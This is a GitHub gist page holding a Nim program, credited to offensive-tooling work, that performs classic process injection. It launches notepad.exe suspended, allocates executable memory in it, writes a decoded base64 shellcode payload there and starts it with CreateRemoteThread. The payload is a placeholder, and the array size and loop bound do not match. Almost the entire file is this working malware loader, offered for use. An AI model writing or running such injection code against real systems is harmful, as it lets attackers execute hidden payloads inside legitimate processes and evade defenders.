Created
September 30, 2021 15:07
-
-
Save mttaggart/b7252d937cd9f49c743fda0f4660b63d to your computer and use it in GitHub Desktop.
Revisions
-
mttaggart created this gist
Sep 30, 2021 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,74 @@ # With special thanks to byt3bl33d3r for Offensive Nim! import winim/lean import osproc import base64 import sequtils import strutils proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void = let tProcess = startProcess("notepad.exe") tProcess.suspend() # That's handy! defer: tProcess.close() echo "[*] Target Process: ", tProcess.processID let pHandle = OpenProcess( PROCESS_ALL_ACCESS, false, cast[DWORD](tProcess.processID) ) defer: CloseHandle(pHandle) echo "[*] pHandle: ", pHandle let rPtr = VirtualAllocEx( pHandle, NULL, cast[SIZE_T](shellcode.len), MEM_COMMIT, PAGE_EXECUTE_READ_WRITE ) var bytesWritten: SIZE_T let wSuccess = WriteProcessMemory( pHandle, rPtr, unsafeAddr shellcode, cast[SIZE_T](shellcode.len), addr bytesWritten ) echo "[*] WriteProcessMemory: ", bool(wSuccess) echo " \\-- bytes written: ", bytesWritten echo "" let tHandle = CreateRemoteThread( pHandle, NULL, 0, cast[LPTHREAD_START_ROUTINE](rPtr), NULL, 0, NULL ) defer: CloseHandle(tHandle) echo "[*] tHandle: ", tHandle echo "[+] Injected" echo "[*] Running in x64 process" var sc = "Base64 Encoded string of comma-separated bytes goes here" var sc_seq = base64.decode(sc).split(",") .map(proc (h: string): string = strip(h)) .map(parseHexInt) var shellcode: array[200626, byte] for s in 0..200261: shellcode[s] = byte sc_seq[s] # This is essentially the equivalent of 'if __name__ == '__main__' in python when isMainModule: injectCreateRemoteThread(shellcode)